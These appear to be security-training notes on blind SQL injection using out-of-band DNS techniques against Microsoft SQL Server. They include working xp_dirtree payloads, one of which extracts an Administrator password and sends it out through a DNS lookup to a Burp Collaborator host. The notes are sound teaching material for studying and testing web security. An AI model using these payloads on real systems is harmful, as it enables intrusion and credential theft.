# Blind SQLi using out-of-band (OAST) techniques
---
- Now, suppose that the _application carries out the same SQL query, but does it asynchronously_. 
- The application continues processing the user's request in the original thread, and uses another thread to execute a SQL query using the tracking cookie. 
- The query is still vulnerable to SQL injection, however none of the techniques described so far will work.
- **The application's response doesn't depend on whether the query returns any data, or on whether a database error occurs, or on the time taken to execute the query**.

- **In this situation**, it is often _possible_ to _exploit_ the _blind SQLi_ vulnerability by _triggering out-of-band network_ interactions to a system that you control. 
- As previously, these can be triggered conditionally, depending on an injected condition, to infer information one bit at a time. 
- But more powerfully, data can be exfiltrated directly within the network interaction itself.

- A variety of network protocols can be used for this purpose, but typically the most effective is DNS (_domain name service_). 
- This is because very many production networks allow free egress of DNS queries, because they are essential for the normal operation of production systems.

- The easiest and most reliable way to use out-of-band techniques is using [Burp Collaborator](https://portswigger.net/burp/documentation/collaborator). 
- This is a server that provides custom implementations of various network services (including DNS), and allows you to detect when network interactions occur as a result of sending individual payloads to a vulnerable application. 
- Support for Burp Collaborator is built in to [Burp Suite Professional](https://portswigger.net/burp/pro) with no configuration required.

The techniques for triggering a DNS query are highly specific to the type of database being used. 
On _Microsoft SQL Server_, input like the following can be used to cause a DNS lookup on a specified domain:
```sql
'; exec master..xp_dirtree '//0efdymgw1o5w9inae8mg4dfrgim9ay.burpcollaborator.net/a'--
```

This will cause the database to perform a lookup for the following domain:
```
0efdymgw1o5w9inae8mg4dfrgim9ay.burpcollaborator.net
```

Having _confirmed a way to trigger out-of-band_ interactions.
You can then use the _out-of-band_ channel _to exfiltrate data_ from the vulnerable application. 
For example:
```sql
'; declare @p varchar(1024);set @p=(SELECT password FROM users WHERE username='Administrator');exec('master..xp_dirtree "//'+@p+'.cwcsgt05ikji0n1f2qlzn5118sek29.burpcollaborator.net/a"')--
```
This input reads the password for the `Administrator` user, appends a unique Collaborator subdomain, and triggers a DNS lookup.

This will result in a DNS lookup like the following, allowing you to view the captured password:
```
S3cure.cwcsgt05ikji0n1f2qlzn5118sek29.burpcollaborator.net
```

- Out-of-band (OAST) techniques are an extremely powerful way to detect and exploit blind SQLi, due to the highly likelihood of success and the ability to directly exfiltrate data within the out-of-band channel. 
- For this reason, OAST techniques are often preferable even in situations where other techniques for blind exploitation do work.

# Lab: Blind SQL injection with out-of-band interaction
---
